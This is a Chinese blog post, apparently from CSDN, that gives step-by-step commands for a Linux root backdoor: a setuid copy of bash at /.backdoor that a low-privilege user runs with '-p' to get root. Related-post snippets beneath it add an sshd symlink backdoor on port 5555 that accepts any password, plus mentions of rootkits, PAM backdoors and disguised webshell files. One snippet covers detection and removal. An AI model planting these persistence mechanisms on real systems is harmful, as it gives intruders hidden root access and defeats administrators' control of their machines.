一种古老的Linux后门

最新推荐文章于 2024-05-07 08:31:17 发布
最新推荐文章于 2024-05-07 08:31:17 发布
阅读量498 收藏
点赞数
分类专栏: 安全笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42936566/article/details/86563669
版权

前言

实践才是检验真理的唯一标准!

过程

这种方式需要先用root权限复制/bin/bash,命令如下:

cp /bin/bash /.backdoor

赋予所有用户都可以执行这个/.backdoor的权限,命令如下:

chmod 4755 /.backdoor

添加一个低权限用户,命令如下:

useradd test

给test用户添加密码,命令如下:

passwd test

切换至一个低权限用户,命令如下:

su test

进入终端后,输入/.backdoor -p即成功。

注意:一定要加上-p参数

不然会出现下图一样的错误(权限依旧没变且访问root目录无权限):

 

最终效果图:

看不尽的尘埃
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Linux后门shell
11-03
linux后门脚本,后门脚本源C语言代码,有兴趣下载回去自己研究。
linux后门用法教程
11-27
linux系统攻防教程,文件解压密码:shaoyu,我只是个群里的搬运工,原创是群里的少宇大佬,看了这个后我觉得很有收获,虽然这个技术可能过时了,但是只要掌握了原理,也许你也能创出新的后门方法。
操作系统后门
weixin_30511039的博客
05-01 1512
操作系统后门学习—Windows篇 0×00 准备工作 假设用户以管理员权限登录系统,在Windows 7系统上使用netcat 创建一个后门。 Netcat 功能比较单一, 缺少了许多我们渗透工作中需要的功能。为此我们将创建一个便携式的工具包来解决这个问题 : 1.下载额外的文件和附加持续. 2.编辑修改指定文件. 3.快速创建执行后门. 4.控制远程服...
Linux常见后门(非常详细)零基础入门到精通,收藏这一篇就够了
最新发布
Libra1313的博客
05-07 3031
Rootkit 是网络犯罪分子用来控制目标计算机或网络的软件。Rootkit 有时可以显示为单个软件,但通常由一系列工具组成,这些工具允许黑客对目标设备进行管理员级控制。黑客通过多种方式在目标计算机上安装 Rootkit:最常见的是通过网络钓鱼或其他类型的社会工程攻击。受害者在不知不觉中下载并安装隐藏在计算机上运行的其他进程中的恶意软件,并让黑客控制操作系统的几乎所有方面。另一种方法是利用漏洞(即软件或未更新的操作系统中的弱点)并将 Rootkit 强制安装到计算机上。
最老的Linux 系统《下载》(转)
08-11 230
最老的Linux 系统《下载》(转)[@more@]为了配合学习《Linux内核完全注释》一书,经过一段时间的摸索,我终于把linux 0.1x内核运行的文件系统制作出来了。为了方便大家实验,我制作了一个在bochs系统下运行的...
Linux权限维持—后门
good good study
04-18 3736
Rootkit是一种特殊的恶意软件,它的功能是在安装目标上隐藏自身及指定的文件、进程和网络链接等信息,比较多见到的是Rootkit一般都和木马、后门等其他恶意程序结合使用。 rootkit是linux平台下最常见的一种木马后门工具,它主要是通过替换系统文件来达到入侵和隐藏的目的。rootkit主要分为文件级别的和内核级别的
linux后门N种姿势.pdf
08-07
前言 后门概述及种类 常见后门功能 Rootkit 发现及检测 后续处理
实战Linux vim后门
04-03
### 实战Linux Vim后门详解 #### 0x00 简介 Vim(Vi IMproved)是一款广泛使用的文本编辑器,以其强大的功能、灵活性以及高效的编辑体验而著称。它支持多种编辑模式,如命令模式、插入模式、可视模式等,这使得...
JSP一句话后门
10-31
JSP一句话后门是指在Java Server Pages(JSP)中使用的一种后门技术,该技术允许攻击者在服务器上写入恶意文件,从而控制服务器的行为。 知识点1: JSP是什么? JSP全名为Java Server Pages,是一种基于Java技术的...
简单的Linux查找后门思路和shell脚本分享
09-15
主要介绍了简单的Linux查找后门思路和shell脚本分享,本文的方法相对简单,提了一个思路和简单的Shell实现脚本,需要的朋友可以参考下
linux后门源码,linux后门
weixin_29466045的博客
05-12 664
ssh软连接#只有root用户才可以这种方法#拿到root权限后执行ln -sf /usr/sbin/sshd /tmp/su; /tmp/su -oPort=5555;#任意密码连接5555端口ssh root@106.13.124.93:5555ssh root@106.13.124.93 -p 5555检测:查看可疑进程# ps aux清除后门:结束进程即可,# kill -s 9 PID添...
linux后门分析,浅谈Linux后门技术及实践入侵
weixin_34511324的博客
05-13 262
2、编译程序encode,依次执行得到关键字符串与magic串异或后的结果,例如原始login的文件名/sbin/xlogin,经过异或后为:\x5e\x14\xf\x13\xb\x4e\x2\x1d\x8\xa\x13\xb3、在后门源代码中这样定义:Charlogin[]="\x5e\x14\xf\x13\xb\x4e\x2\x1d\x8\xa\x13\xb";然后插入异或函数char *de...
【一个Linux后门隐藏技巧】
qq_55213436的博客
08-15 1048
根据Linux的系统特性,经过一定的测试发现,Linux操作系对于如:xige.jpg .php类型的文件会识别为:xige.jpg类型的文件。这个是管理员最容易忽视的地方,所以我们只需要在访问的url页面中输入如:xige.jpg.%09.php就会变相的访问到xige.jpg .php;但是管理员却很难辨认出该木马文件,我们只需要访问的url页面中输入如:xige.jpg.%09.php就会变相的访问到xige.jpg .php,即可触发这个木马。......
使用Linux系统命令对后门端口进行查杀
旺仔Sec&blog
06-16 1663
使用Linux系统命令对后门端口进行查杀
倒反天罡的ssh后门Linux 后门系列
jijisaq的博客
04-08 1623
今天看见有安全研究员发了一篇 ssh 后门的文章,复现思考后分享给大家。
Linux 内核级后门的原理和简单实战
Top大杂烩
05-31 2432
用户空间与内核空间---------------------------linux是一个具有保护模式的操作系统。它一直工作在i386 cpu的保护模式之下。  <!--google_ad_client = "pub-2299987709779770";google_ad_width = 300;google_ad_heigh
Linux权限维持—OpenSSH&PAM后门&SSH软连接&公私钥登录
剁椒鱼头没剁椒的博客
08-22 2776
由于密码日志文件是被隐藏的,所以可以直接使用cat去查看,这里只要管理者使用ssh进行连接就会记录密码,而这些操作都是无感的,当然若管理员会去定期排查,那么该被发现还是会被发现的,这些都是基于管理员不会定期去排查才能够持久。这里要注意一个问题就是,不一定编译就能够成功,有时候根本无法编辑,从网上找的很多资料中,都跳过直接给命令,所以这里我就提前说一下,不一定能够编译成功,不成功再次重新测试,若还是不行,就拉到吧。这里重启也可能存在问题,这个实验有时候很莫名其妙的,有时候能够测试成功,有时候测试是不成功的。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值